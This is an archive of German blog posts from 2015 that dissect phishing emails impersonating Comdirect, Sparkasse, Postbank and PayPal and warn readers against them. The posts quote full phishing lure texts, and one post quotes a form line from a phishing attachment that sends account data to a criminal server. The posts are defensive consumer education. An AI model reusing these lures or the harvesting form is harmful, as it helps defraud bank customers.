Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.

Kategoriearchiv „Phishing“

BetreffAW: Ihre Online-Zugang

Samstag, 15. August 2015

Nein, diese Mail kommt nicht von der ComDirect-Bank. Mein Exemplar kam von einem Server, der bei einem mittelgroßen rumänischen Hoster in Bukarest steht.

Sehr geehrte Kundinnen und Kunden der ComDirect,

vorab möchten wir uns gerne für Ihre treue Kundschaft bei uns bedanken. Wir legen großen Wert auf Ihr Vertrauen und Ihre finanzielle Sicherheit, und arbeiten ständig daran, diese zu verbessern. Wir haben unseren Zentralen Banking Server erneuert und den derzeit höchsten europäischen Sicherheitsstandarts angepasst. Dies wird nun auch in unserem Online-Banking passieren. Um diese Anpassung zu starten, klicken Sie bitte unten, um sich beim Online-Banking einzuloggen. Nach der Anmeldung werden Ihnen fünf Sicherheitsfragen gestellt, um Ihre Identität zu bestätigen:

loggen Sie sich bitte hier ein —–>

Nach der Beantwortung der Sicherheitsfragen werden Sie automatisch aus dem zentralen Online-Banking ausgeloggt. In Kürze werden Sie von uns kontaktiert, um den Vorgang abzuschliessen. Wir danken für Ihr Verständnis.

Mit freundlichen Grüßen,

Ihre COMDIRECT.

Sehr geehrte Opfrinnen und Opfer der Phisher,

vorab möchten wir uns gerne für ihre Leichtgläubigkeit bei uns bedanken. Wir legen keinen Wert darauf, überzeugend zu klingen und verzichten seit Jahren darauf, unsere fadenscheinigen Stories zu verbessern. Diesmal sprechen wir davon, dass wir einen Computer ausgetauscht haben, und damit diese Banalität ein bisschen größer klingt – sie sind ja schließlich alle Idioten – blahfaseln wir einen von „Sicherheitsstandarts“. Natürlich mit „t“, weil uns die Benutzung einer Rechtschreibprüfung zu anstrengend und zu viel der Mühe wäre. Und weil wir einen neuen Computer gekauft haben, müssen sie jetzt auf „Click here“ klicken und uns ganz viele Dinge sagen, die ihre Bank schon lange weiß, weil wir Phisher sie wissen wollen. Das kennen sie doch. Das ist doch immer so, wenn sich eine Bank einen neuen Computer zulegt: Den Kontostand kriegen die irgendwie übertragen, aber alles andere fällt in digitale Vergessenheit. Wenn sie genug Daten eingegeben haben, dass wir damit ihr Konto und ihre Identität übernehmen und allerlei Betrugsgeschäfte zu ihren Lasten machen können, dann rufen wir sie nochmal an und leiern ihnen „für die Bestätigung“ auch noch eine TAN raus, mit der wir ihr Konto leerräumen. Vielen Dank noch einmal, dass sie für alles Verständnis haben, weil es ihnen an jedem Verstehenkönnen mangelt.

Mit der Freundlichkeit einer Ohrfeige,

Ihr Phisher mit der blöden Masche.

Sparkasse Online-Konto Aktualisierung

Donnerstag, 13. August 2015

Sehr geehrter Kunde,

Genau mein Name!

HINWEIS: Zugriff auf Ihr Online-Konto läuft kurz.

HINWEIS: Zugriff auf das Spammerhirnchen läuft knapp.

Um weiterhin diesen Vorteil zu nutzen, bitten wir Sie Daten auf den folgenden Link, um zu bestätigen.

Sparkasse Online-Konto Aktualisierung: klicken Sie hier

Toll, in ein gecracktes WordPress-Blog! Da glaubt jeder – die Spam ist ja auch sprachlich wieder einmal extragut geraten – sofort an die Sparkasse und gibt deshalb in einem „Antrag“ lauter Daten ein…

Screenshot eines Details der Phishing-Seite

…die die echte Sparkasse schon lange kennt. Egal, was für einen Sinn das haben soll. So kommen Verbrecher an Konten anderer Leute und an Adressmaterial für betrügerischen Identitätsmissbrauch.

Gut, dass die meisten Phisher so stümperhaft sind.

Schlimm, dass es trotzdem zu funktionieren scheint.

Dank für Ihre Mitarbeit und Verständnis.

Mit freundlichen Grüßen.
Ihre Sparkasse Kundenservice.

Mit mechanischem Gruß vom Phisher.

Stagefright-Virus bedroht ihr Konto

Dienstag, 11. August 2015

Das Wichtigste vorab: Diese E-Mail kommt nicht von der Postbank. Es ist Phishing und der Versuch, ihnen einen Trojaner unterzujubeln. Löschen sie diese E-Mail! Wenn sie das mir als „irgendeinem dahergelaufenen Blogger“ nicht glauben wollen (was durchaus vernünftig ist, denn sie kennen mich nicht und ich kann ein beliebiger Vollidiot sein), überzeugen sie sich davon, indem sie kostenlos bei der Postbank-Hotline für Sicherheitsfragen unter der Telefonnummer 0800 1008906 anrufen und dort noch einmal nachfragen! Und nachdem sie dort die Bestätigung gehört haben, löschen sie diese Spam! Die Postbank versendet solche E-Mails nicht. Kommen sie auf gar keinen Fall auf die Idee, wegen einer E-Mail einer Bank irgendwelche Daten irgendwo einzugeben! Egal, was der Grund dafür sein soll! Es ist eine sehr schlechte Idee, die sie viel Geld kosten kann und ihnen monatelangen Ärger aller Art einbringen kann. Und wenn sie schon die Hotline anrufen, stellen sie dort auch gleich die Frage, warum vor dieser sehr gefährlichen laufenden Betrugsnummer noch nicht prominent auf der Kundenwebsite der Postbank gewarnt wird, denn zurzeit scheint bei der Postbank noch niemand auf diese naheliegende Idee gekommen zu sein – obwohl dort ansonsten geradezu vorbildlich auf gängige Betrugsmaschen hingewiesen wird. Eine prominent platzierte Warnung könnte so viel Schaden verhindern und kostet dabei so wenig Aufwand…

So, jetzt aber…

Es war ja klar, dass die Spammer darauf aufspringen würden. Wer auch nur eine Spur Verantwortung fühlt, wird allerdings niemals auf die Idee gekommen sein, seine Kontoführung mit einem Wischofon¹ zu machen – denn in diesen werksseitig funktionslimitierten Computern für Dumme verbindet sich die Security-Blauäugigkeit der Neunziger Jahre mit der technisch kompetenten organisierten Kriminalität der Zehner Jahre.

Tja, und wer seine Kontoführung nicht mit so einem gefährlichen Spielzeugtelefon macht, der lacht schon beim Anblick des Betreffs, lehnt sich zurück und hat eine Möglichkeit weniger, mit derart plumpen Nummern überrumpelt zu werden.

Diese Spam habe ich übrigens nicht selbst empfangen, sie wurde mir von einem Freund mit Konto bei der Postbank zugesteckt, der schon wegen des…

Von: „Postbank.de“ <do-not-reply@postbank.de>

…in der Spam angegebenen Absenders verunsichert war, ob sie nicht echt sein könnte. Ich hoffe, er hat sich jetzt für alle Zeiten gemerkt, das der Absender einer E-Mail ohne Aufwand gefälscht werden kann und somit gar nichts über die Herkunft einer E-Mail sagt. Was Banken tun können, um solche Verunsicherungen bei Empfängern von kriminellen Phishing-Spams zu verhindern, habe ich schon vor vier Jahren geschrieben und werde es hier nicht wiederholen. Dass die meisten Banken immer noch nichts tun, ist ein Beleg dafür, dass ihnen ihre Kunden egal sind und dass sie sich nicht daran stören, wenn Kriminelle das Geld ihrer Kunden für dicke Autos, Kokain und Prostituierte ausgeben können. Als Kunde einer solchen Bank würde ich die darin ausgedrückte Verachtung in vollem Umfang zurückgeben und mir einen seriöseren Dienstleister für meine Geldsachen suchen.

Sehr geehrte/r Kunde,

Weder kennt diese „Postbank“ den Namen des Empfängers, noch macht sie eine Angabe, auf welches Konto sich diese Mail bezieht². Spätestens an dieser Stelle sollte jedem Empfänger klar sein, dass es sich um eine Spam handelt.

Die Postbank Sicherheitszentrale [sic! Deppen Leer Zeichen] warnt vor einer Sicherheitslücke beim Smartphone-Betriebssystem Android von Google. Hacker könnten die Daten einfach per MMS stehlen [sic!] und ihr Handy karpern. Der Virus schleicht sich von alleine in ihr System [sic! Komma fehlt.] ohne dass Sie es bemerken.

Ich gehe darauf inhaltlich nicht weiter ein, außer vielleicht diese eine Kleinigkeit: Es geht bei Stagefright nicht um „Daten per MMS stehlen“, sondern um „beliebigen Code in eine MMS (oder ein irgendwie, zum Beispiel bei einem Hangout, vom Wischofon verarbeitetes Video) einbetten und unbemerkt ausführen“. Der „Postbank Sicherheitszentale“ aus der wirren Kopfwelt dieser Spammer scheint das nicht so völlig klar zu sein, und offenbar setzen die Kriminellen auch darauf…

Einen ausführlichen Bericht über den Stagefright Virus finden sie auf Hier [sic!]

…dass ihre Opfer mit dem verlinkten Artikel auf Zeit Online intellektuell überfordert sind. Das sind ja immerhin Buchstaben, die Text formen, der gelesen werden will – und übrigens recht unklar ist, da er mutmaßlich von einem Journalisten ohne vertiefte technische Kenntnisse verfasst wurde. Eine etwas klarere Darlegung gibt es bei Heise Online.

So schützt die Postbank Sie!

1. Wenn Sie im Besitz einen Android-Handys dann folgen Sie bitte den Anweisungen!

Aha, die „Postbank“ schützt mich, indem ich den Anweisungen folge. Vielleicht sollten die „Sicherheitsexperten“ dort mal einen Deutschexperten einstellen, damit die Formulierungen nicht so mies klingen… 😀

2. Klicken Sie „hier“ oder öffnen Sie die Datei in ihrem E-Mail Anhang!

Ein Klick auf „Click here“ in einer digital unsignierten Mail eines Unbekannten ist immer ein ganz besonders großer Beitrag zur Computersicherheit… :mrgreen:

3. Füllen Sie alle Daten aus und bestätigen Sie auf „Daten absenden“

Ich denke, die „Postbank“ will mich schützen. Stattdessen soll ich einen Anhang öffnen und ausfüllen. Dieser Anhang ist übrigens eine HTML-Datei. Wer Interesse daran hat: den Quelltext habe ich bei Pastebin hochgeladen. Das Wichtigste steht in Zeile 110, ich habe hier mal den interessanten Teil isoliert:

<form ... action="http://b.adress-datenabgleich.com/postbank_check.php" ...>

Die eingegebenen Daten gehen nicht an einen Server in der Domain der Postbank, sondern über die obskure und vor ein paar Tagen anonym registrierte Domain adress (strich) datenabgleich (punkt) com an einen von Verbrechern kontrollierten Server, der zu diesem Zeitpunkt erfreulicherweise schon vom Internet genommen wurde. (Ein Dank an den Hoster für die schnelle Reaktion! Aber es kann ja auch nicht jeder so langsam wie die Postbank sein, wenn millionenfacher Betrug durchgeführt wird…)

Welche Daten das sind? Diese Daten hier:

Screenshot des Anhanges mit einer Phishing-Seite im Design der Postbank. Unter der Überschrift 'Postbank Stagefright Virus entfernen' soll die E-Mail-Adresse, die Kontonummer und ein Passwort oder eine PIN eingegeben werden.

Wer den Verbrechern so Zugriff auf das Postbank-Konto gegeben hat und ihnen bestätigt hat, unter welcher Adresse die Spam ankommt und beklickt wird, darf sich schon „freuen“:

Screenshot des zweiten Schrittes der Phishing-Seite. Text: Weiteres vorgehen [sic!] -- Wir senden ihnen umgehend eine E-Mail mit einer Software, mit der Sie den Stagefright-Virus entfernen können. -- Gehen Sie Schritt für Schritt nach unserer Anleitung vor und entfernen sie den Stagefright-Virus. -- Sollten Sie nicht wie vorgeschrieben den Stagefright-Virus entfernen und ein Schaden ensteht [sic!], ist die Postbank nicht verpflichtet den Schaden zu erstatten.

Der nigelnagelneue Trojaner, den garantiert noch kein Antivirus-Schlangenöl kennt, wird gleich hinterhergeliefert.

Wir senden ihnen umgehend eine E-Mail mit einer Software mit der Sie den Stagefright-Virus entfernen können.

Die allerdings sehr naheliegende Frage, warum die „Postbank“ nicht gleich jedem ihrer angemailten Kunden eine E-Mail mit einer derartigen Software zusenden sollte, die beantwortet der freundliche Phisher und Cracker nicht.

Übrigens ist „Stagefright“ kein Virus, außer vielleicht in einem eher skurillen Sinn des Wortes. Es ist eine schwere, auf vielerlei Wegen ausbeutbare Sicherheitslücke in Android.

Mit freundlichen Grüßen
Ihre Sabine Heinel
Postbank Newsletter-Redaktion

Wenn das die Freundlichkeit ist, will man den Hass nicht mehr kennenlernen.

¹Wischofon ist mein deutsches Wort für das Reklamewort „smart phone“. Es bezeichnet den Gegenstand nach der Tätigkeit, die am häufigsten auf ihn ausgeführt wird: Wischen mit den Fingern. Ich meine das nicht als Schimpfwort.

²Es ist gar nicht selten, dass jemand mehrere Konten hat.

Re: Signed Invoice

Donnerstag, 6. August 2015

Die ist ja kurz!

Dear Sir,
The attached invoice is for FYI.

Best Regards.

So weit, so schlecht. Bei diesem kurz angebundenen Text erwarte ich eine knackige EXE-Datei in einem ZIP-Archiv; aber nein, es handelt sich wirklich um ein PDF. Dieses PDF sieht aber nicht aus wie eine Rechnung, sondern es sieht so aus:

Screenshot eines Teils des PDFs

So sieht zumindest die obere rechte Ecke des PDFs aus. Sie zeigt den Hinweis, dass es eine angehängte Datei gibt (als ob man das nicht in seiner Mailsoftware gesehen hätte), ein übergroßes PDF-Piktogramm und einen klicki klicki Linktext mit „Click here“. Der Link aus dem PDF ist kein direkter Link, sondern wird über einen URL-Kürzungsdienst umgeleitet. Und zwar auf eine Website…

Screenshot der gefährlichen Website

…die so tut, als sei sie Google, die aber in wenig überraschender Weise mit Google…

Detail: Die angezeigte URL in der Adressleiste des Browsers

…so viel zu tun hat wie eine kaputte Glühlampe mit dem hellen, warmen Sonnenlicht. Natürlich muss man Javascript freischalten, um irgendwas auf dieser Website von Kriminellen zu machen, und was man sich dort alles einfangen kann, verrät schon die Spam, der falsche Eindruck, es handele sich um Google und die merkwürdige Art, in der ein Link auf diese Site platziert wurde.

Selbstverständlich wird – neben dem angebotenen Download von Daten, die Kriminelle mit einer Spam untergejubelt haben – auch gleich das Google-Passwort abgefragt und zu diesem Geschmeiß gesendet, wenn man auf „Download“ klickt – aber ich hatte bei dem schönen Wetter heute keine Lust, den Rest der Javascript-Quelltexte zu lesen. Wenn es neben Phishing auch noch eine aktuelle Kollektion Schadsoftware gibt, bin ich davon nicht überrascht.

Was diese Spam interessant macht, obwohl sie in ihrer Machart eher primitiv ist: Die frühere Vorgehensweise mit dem „Dokument im ZIP-Archiv“ scheint für die Verbrecher nicht mehr so erfolgversprechend zu sein – was leider nicht heißt, dass ich solche Spams nicht mehr sähe – und so suchen sie nach neuen Wegen, um Leute zu überrumpeln.

Deshalb: Immer aufmerksam bleiben! Vor allem, wenn Unbekannte „Rechnungen“ oder „Mahnungen“ in Mailanhängen versenden, aber im Text der Mail nichts Substanzielles mitzuteilen haben (weil man sonst sofort bemerken würde, dass es sich um gegenstandslose Behauptungen handelt). So einen Müll einfach löschen und vergessen, es gibt nämlich Schöneres im Internet als Trojaner und sonstige Schadsoftware.

Ihre Sicherheit ist uns wichtig PayPal

Freitag, 31. Juli 2015

Absender: "PayPal Service-Team" <slava (at) sbcglobal (punkt) net>

Also Spammer, wenn du schon deinen Absender fälschst, dann kannst du doch wenigstens einen hinmachen, der ein bisschen wie PayPal aussieht. Vollidiot!

Wir brauchen Ihre Unterstützung!

Wie, will dieses „PayPal“ jetzt Spenden einsammeln? :mrgreen:

Guten Tag,
bedingt durch eine erhöhte Zahl der Angriffe auf unser Netzwerk führen wir regelmäßige, zufällige Verifizierungen unserer Kundenkonten durch. Mit Hilfe dieser Kontrollen beugen wir möglichen Fällen von Missbrauch vor und erhöhen zusätzlich die Sicherheit unserer Kunden.

So so, „Guten Tag“ ist der Name des Kunden…

Einmal ganz davon abgesehen: Eine erhebliche Anzahl von PayPal-Kunden dürfte mehrere PayPal-Konten unterhalten, zum Beispiel, um gewerbliche von privater Nutzung zu trennen. (Ich habe mir sagen lassen, dass es sogar noch Menschen geben soll, die Steuern zahlen und Bücher führen…) Mit an Sicherheit grenzender Wahrscheinlichkeit würde PayPal in einer echten E-Mail Angaben machen, die keinen Zweifel daran lassen, auf welches PayPal-Konto sich diese E-Mail bezieht.

Und ansonsten: Dieses „PayPal“ eines Spammers hat also Admins, die dazu fähig sind, Angriffe auf PayPals Netzwerk zu erkennen, denen aber keine bessere Abwehr einfällt, als zufällig irgendwelche Kunden anzuschreiben und ihnen irgendwelche sinnlose Mühe aufzubürden – zum Beispiel die erneute Mitteilung von lauter Daten an „PayPal“, die das richtige PayPal schon lange kennt. Die Angreifer können unterdessen fröhlich weitermachen.

Man muss schon sehr naiv sein, um diesen Köder zu schlucken. Und man muss schon ein Vollidiot von Spammer sein, um sich eine derart dürftige Idee aus den Fingern zu saugen und die auch noch für gut zu halten. Ich weiß nicht, in welcher Ballerburg unser Spammer fünf Mal täglich ganz viele bunte Smarties verfrühstückt, um derartige Vorstellungen von der technischen Administration in einem großen Internet-Unternehmen zu entwickeln, aber ich weiß, dass diese Medikation seiner geistigen Leistungsfähigkeit nicht bekommt.

Wir bitten Sie daher, sich als Inhaber Ihres PayPal-Kontos zu identifizieren und uns dabei zu unterstützen, die Rechtmäßigkeit des Kontos sicherstellen zu können.

So so, ich soll mich „identifizieren“. Aber das geschieht natürlich nicht mit einem Ausweisdokument oder einem Verfahren wie PostIdent, sondern…

Ist es nicht möglich, Sie als Inhaber zu identifizieren, wird das Konto aus Sicherheitsgründen gesperrt, um einen möglichen Missbrauch zu verhindern.
Klicken Sie hier um sich zu verifizieren

…durch einen Klick auf den dümmstmöglichen Linktext „Click here“, den es nur in Spam und grenzdementer Schrottwerbung gibt¹. Damit man das auch tut, wird angedroht, dass man nicht mehr an sein Geld rankommt, wenn man es nicht tut.

Und so soll ein Unternehmen mit seinen Kunden umspringen? Zufälligen Stichproben von Kunden sagen, dass sie gefälligst in einer nicht einmal digital signierte Mail herumklicken sollen, weil die Admins nicht dazu imstande sind, die erkannten Angriffe zu behandeln? Nur ein durch seine dumme Kriminalität quasi lobotomierter Spammer kann auf solche Ideen kommen.

Der Link führt in die Domain paypallog (punkt) de, also nicht in die Domain von PayPal. Diese Domain wurde vorgestern erst von Herrn Domain Master [sic!] aus dem brummenden Moskau registriert, der auch ansonsten Daten angegeben hat, die nicht den Verdacht erwecken, dass sie echt sein könnten. Gehostet wurde die Phishing-Site bei einem deutschen Hoster, der den kriminellen Unfug inzwischen aus dem Web entfernt hat. Danke dafür! 😉

Viele Grüße,
Ihr Service-Team
www.yac.mx

Oh, gucke mal, PayPal hat eine neue Adresse. :mrgreen:

¹Click here ist eine der Regeln, mit denen ich Spams aussortiere. Es ist eine Regel, die niemals zu Fehlerkennungen führt. Kein fühlender Mensch schreibt solche Linktexte. Nicht einmal ein nur mittelmäßiger Werber tut das, auch dann nicht, wenn er völlig unmotiviert ist. Wenn irgendwo „klicken sie hier“ steht, handelt es sich um Kriminalität oder eine dermaßen große Dummheit, dass man bedauert, dass es kein Gesetz dagegen gibt. Beides braucht kein Mensch.

Sparkasse Online-Konto Aktualisierung

Dienstag, 21. Juli 2015

Sehr geehrter Kunde,

Wir sind derzeit die Aktualisierung unserer Datenbank, Sparkasse zeigen, dass der Zugriff auf Ihr Online-Konto läuft kurz.
Um weiterhin diese Vorteile nutzen, bitten wir Sie Daten auf den folgenden Link, um zu bestätigen.

Sparkasse Online-Konto Aktualisierung: klicken Sie hier
Mit freundlichen Grüßen,

Ihr Sparkasse Kundenservice

Gibt es noch jemanden auf dieser Welt, dem nicht schon wegen der Sprache dieser Mail sofort klar ist, dass es sich um Phishing handelt? Jemand, der sich auch nicht darüber wundert, dass er vom dümmsten Linktext der Internetgeschichte „klicken sie hier“ nicht etwa in die Domain der Sparkasse, sondern in die Domain hospitalio (punkt) com (punkt) mx geführt wird, was übrigens spätestens beim Blick in die Adresszeile des Browsers deutlich sein sollte, wenn man in die Mail geklickt hat? Und der dann dort, auf so einer Seite…

Screenshot der Phishing-Seite

…der „Sparkasse“ eine Menge Daten mitteilt, die die richtige Sparkasse schon längst kennt, ohne sich zu fragen, welchen Zweck das haben könnte?

Nun, wenn es solche Menschen noch gibt, verstehe ich ehrlich gesagt nicht, dass die ein Konto führen können und geschäftsfähig sind. Vermutlich ist an solchen Leuten auch ein kleiner Link in die richtige Website der Sparkasse verschwendet:

Ihre Sparkasse wird Sie niemals dazu auffordern, aus einer E-Mail heraus Webseiten zu öffnen, um dort Kontodaten einzugeben.

Mehr muss ein Sparkassen-Kunde in dieser Sache nicht wissen – auch nützlich für den Fall, dass es mal gut vorgetragenes, wirklich gefährliches Phishing gibt: Alle E-Mails mit Links auf Seiten zur Dateneingabe sind nicht von einer Sparkasse. Was in der verlinkten Seite leider nicht so deutlich wird: Das gleiche gilt für Mailanhänge. Alle E-Mails, an denen ein Formular zur Dateneingabe angehängt wurde, sind ebenfalls nicht von einer Sparkasse – und völlig unabhängig davon sollten unverabredet zugestellte Mailanhänge generell niemals geöffnet werden, weil es sich um den zurzeit wichtigsten Verbreitungsweg für Schadsoftware handelt. (Und nein, ein Antivirus-Programm hilft in so einem Fall oft nicht. Das bedeutet im Zweifelsfall: Das Antivirus-Programm hilft überhaupt nicht. Also niemals einen unverabredet zugestellten Mailanhang aufmachen! Das hilft nämlich.)

BetreffAW: Ihr Onlinebanking-Zugang

Montag, 20. Juli 2015

Es ist mir auch ohne das Wort „Betreff“ im Betreff klar, dass es sich um einen Betreff handelt.

Die E-Mail ist HTML-formatiert und ahmt im Großen und Ganzen das Design der Website der Comdirekt Bank AG nach. Das großformatige, für eine E-Mail völlig ungeeignete Layout wird sicherlich häufig nicht gut lesbar dargestellt.

Wer diese Mail bekommen hat und sich unsicher ist: Nein, trotz des Layouts kommt diese Mail nicht von der Comdirekt Bank AG, sondern von Kriminellen, die Menschen zur Preisgabe ihrer Daten überrumpeln wollen, damit sie das Konto übernehmen können. Ich kann leider nicht beurteilen, ob die Comdirekt Bank AG zurzeit ihre Kunden vor dem laufenden Phishing warnt, da die Comdirekt Bank AG eine Website betreibt, die ohne aktiviertes Javascript keine Inhalte darstellt. Einer in meinen Augen unseriösen und verachtenswerten Unternehmung wie einem Kreditinstitut werde ich gewiss nicht gestatten, Code in meinem Browser auszuführen…

Screenshot eines Details aus der Comdirekt-Bank-Website: 'In Ihrem Browser ist JavaScript deaktiviert. Die Nutzung der comdirect-Website ist ohne JavaScript nicht möglich. Sollten Sie weiterhin Probleme mit dem Zugriff auf die Seite haben, wenden Sie sich bitte während unserer Servicezeiten an unsere Hotline unter der Rufnummer 04106 - 708 xx xx.'Es gibt übrigens keinen sachlichen oder technischen Grund, öffentlich lesbare Inhalte nicht in textueller Form zu hinterlegen – also so, wie es zum Beispiel hier bei Unser täglich Spam geschieht. Wenn die Comdirekt-Bank Interessierten und Kunden auf der Startseite – siehe Screenshot rechts – verkündet, dass dies nicht möglich sei, handelt es sich um eine Unwahrheit; in Wirklichkeit sind die Betreiber dieser Website aus mir unbekannten Gründen unwillens, die einfachen Dinge auf einfachem Wege zu machen. Welche Gründe das sein könnten, gehört zu den Fragen, über die ich nur spekulieren kann, und keine meiner Annahmen würfe ein gutes Licht auf die Comdirekt Bank AG.

Jetzt aber zur Spam:

Sehr geehrte Kundin,
Sehr geehrter Kunde,

wie Sie wissen, wird unser online-banking stets aktualisiert, um immer den höchsten Standart [sic!] an Synchronität [oha!] und Sicherheit beizubehalten. Um sicherzustellen, dass Sie das neue System des online-bankings problemlos und synchron nutzen [sic!] können, müssen Ihre persönlichen Address- und Telefondaten noch einmal von Ihnen bestätigt werden. Dies ist notwendig um keine alten Daten in das neue Onlinebanking zu übernehmen [sic!]. Um Ihre persönlichen Daten zu aktualisieren, melden Sie sich hier bitte zunächst bei Ihrem Onlinebanking an.

Klicken Sie hier – >

Sehr geehrtes Namenloses,

für den gar nicht so seltenen Fall, dass sie mehrere Konten haben, sagen wir ihnen nicht, um welches Konto es sich handelt. Wir fummeln ständig an unserem Technozauber für die Internet-Fernkontoführung herum, und sie wissen das ja schon. Das machen wir wegen Standarten, Sicherdingsbums und zeitlicher Übereinstimmung. Damit sie das Dingens jetzt weiter nutzen können, müssen sie uns eine Menge Daten mitteilen, die wir schon längst wüssten, wenn wir ihre Bank wären. Warum? Damit wir nicht versehentlich veraltete Daten benutzen. Ihre vertragliche Verpflichtung, Änderungen umgehend mitzuteilen, bleibt davon natürlich unberührt. Und jetzt melde sie sich an und klicken sie auf „klick hier“, einem dummen Text, der nur in Spams und anderen unerwünschten Mails zu finden ist! Wundern sie sich nicht darüber, dass die Website der „Comdirekt Bank“ jetzt in einer russischen Domain liegt, und wundern sie sich auch nicht darüber, dass der Link indirekt gesetzt ist und einen Umweg über eine andere gehackte Website geht!

Die Phishing-Seite sieht so aus:

Screenshot der Phishing-Site

Herzallerliebst auch die Warnung vor Wischofon-Trojanern! Aber natürlich sollte man generell niemals in eine E-Mail klicken, um die Website einer Bank aufzurufen, denn damit wird man leicht von Verbrechern überrumpelt. Seit ungefähr 21 Jahren¹ haben Webbrowser so genannte „Lesezeichen“. :mrgreen:

Nachdem Sie das Formular im Onlinebanking ausgefüllt haben, wird von Ihnen kein weiterer Schritt zur Aktualisierung benötigt. Sie werden innerhalb von 48 Stunden nach dem Ausfüllen des Formulars von einem Mitarbeiter unserer online-banking Abteilung telefonisch kontaktiert, um die Aktualisierung Ihres Online-Banking abzuschließen. Vielen Dank für Ihr Verständnis und Ihr Vertrauen in die comdirect.

Nachdem sie aufs Phishing reingefallen sind, sind sie fertig und brauchen nichts mehr zu tun. Sie müssen nur noch eines tun: In den nächsten Stunden jemanden, der sie anruft, weitere Daten am Telefon sagen! Vielen Dank für ihre Dummheit und ihr Vertrauen in etwas Layout in einer HTML-formatierten Mail – aber da können sie ja auch gar nicht anders, weil die meisten Kreditinstitute sich nach wie vor ohne jeden technischen und sachlichen Grund dagegen verwehren, grundsätzlich nur noch digital signierte E-Mail an ihre Kunden zu versenden, um auf diese Weise den Absender und den unveränderten Inhalt überprüfbar zu machen und so den Phishing-Sumpf langsam auszutrocknen. Die dafür erforderliche Technik steht sogar schon viel länger zur Verfügung als die Lesezeichen in Webbrowsern, und sie kostet nichts.

Vielen Dank für Ihr Verständnis und Ihr Vertrauen in die comdirect.

Ach ja, und danke, dass sie volles Verständnis dafür haben, dass ich als Spammer es nicht so mit der Sorgfalt habe und deshalb sehr nachlässig werde, wenn ich meinen eigentlichen Betrugstext fertig habe.

Mit freundlichen Grußen [sic!],

Kundendienst,

Mit freundlichem Gruseln
Dein Phishing-Spammer

¹Der erste Webbrowser mit Lesezeichen war meines Wissens der Mosaic Netscape 0.95 beta aus dem Jahr 1994.

Wichtig: Datenspeicherung

Donnerstag, 16. Juli 2015

Diese E-Mail mit dem gefälschten Absender service (at) paypal (punkt) com kommt natürlich nicht von PayPal, sondern von Kriminellen – und darin ist eine sehr originelle Phishing-Masche, von der ich erwarte, sie in den nächsten Tagen noch häufiger zu sehen:

Screenshot der Phishing-Spam -- PayPal -- E-Mail Adresse (unkenntlich gemacht), Datum 15. Juli 2015 -- Wichtiger Hinweis zur Datenspeicherung -- Guten Tag (Name unkenntlich gemacht), Wie Sie bereits wissen, wurde die Vorratsdatenspeicherung per Gesetz verabschiedet und auch wir sind gezwungen zu handeln. Durch diese Gesetzesänderung werden Sie nun aufgefordert, Ihre bestehenden Daten zu bestätigen respektive zu aktualisieren! -- Zur Bestätigung

Die schwarzen Balken sind von mir. Die Spam kommt mit namentlicher Ansprache.

Natürlich ist die in der BRD eventuell demnächst geltende Vorratsdatenspeicherung völlig irrelevant für ein Unternehmen wie PayPal, das seinen Sitz in Luxemburg hat. Aber auch, wenn PayPal in der BRD ansässig wäre: Die Vorratsdatenspeicherung ist in diesem Zusammenhang eine idiotische Begründung für eine Dateneingabe. PayPal speichert sowieso die Kundendaten und die Geschäftsvorfälle, das ist auch erforderlich, um die Dienstleistung PayPals anbieten zu können, während das neue Menschenüberwachungsgesetz der Bundesrepublik Deutschland Anbieter von Kommunikationsdienstleistungen zu einer anlasslosen, vollständigen und betrieblich sinnlosen Überwachung ihrer Kunden verpflichtet.

Darüber hinaus sollte sich jeder PayPal-Kunde im Klaren sein, dass PayPal nach eigenen Angaben derartige E-Mails niemals an seine Kunden versendet:

Wir fordern Sie nie auf, persönliche Daten direkt auf einer Website einzugeben. Wenn wir Ihre Hilfe benötigen, fragen wir Sie immer über eine Nachricht in Ihrem PayPal-Konto

Mit diesem Wissen ist es eine Kleinigkeit, jede Phishing-Spam für PayPal-Kunden zu erkennen und direkt ins Tönnchen zu befördern. Auch, wenn sie originell formuliert ist, in überzeugendem Design kommt und eine namentliche Ansprache hat.

Die Regel lautet: Es kommt angeblich von „PayPal“, fordert mich auf, Daten herzugeben (zu „bestätigen“, zu „verifizieren“, „abzugleichen“ und vieler Unfug mehr) und enthält etwas zum Draufklicken, wo ich das tun soll? Das bedeutet, dass es sich um Phishing handelt.

Diese Spam ist ein Zustecksel meines Lesers E.T.

Close

⚠️ Kein Adblocker erkannt 🛑

Bitte installieren Sie so schnell wie möglich einen Adblocker für ihren Webbrowser! Sie schützen damit die Ihren Computer vor Schadsoftware, die über Malvertising verteilt wird, und Sie schützen sich selbst vor Ausspähung und intransparentem Datenhandel durch halbseiden bis grenzkriminell vorgehende Wirtschaftsunternehmen. Das ist Grund genug, einen Adblocker zu verwenden. Aber gleichzeitig machen Sie auch Ihre gesamte Interneterfahrung schöner, erfreulicher und schneller. Ich empfehle uBlock Origin.